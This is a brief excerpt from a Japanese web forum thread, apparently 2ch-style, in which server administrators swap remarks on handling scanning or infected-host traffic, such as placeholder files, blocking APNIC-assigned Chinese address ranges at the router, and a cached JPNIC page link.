・指定ファイルにアクセスしようとしたのは載せない。
・実際に、0Byteの指定ファイルを作っておく。
があった。みんなどうよ?つーかどれが普通よ?
APNICかよ。
マトモなとこだから他から経由されてるだけな気がするな・・・
それ中国あたりのブロック割り当てじゃない?
うちにも中国方面からガンガンくるよ。
ルーターで弾く。
手作業での登録ですか?
手間が馬鹿にならんので、テクニックあればいいんだけど。
JPNIC に関連団体で乗ってるところ。ほんとに感染してるなら微妙に恥かと。
http://216.239.57.100/search?q=cache:5uDTH1GaA9oC:www.nic.ad.jp/ja/profile/link.html+Asia+Pacific+Network+Information+Centre&hl=ja&lr=lang_ja&ie=UTF-8
ネタだよね?ね?ね?
うちもきてるよ。
100〜のスレッドの続きを読む
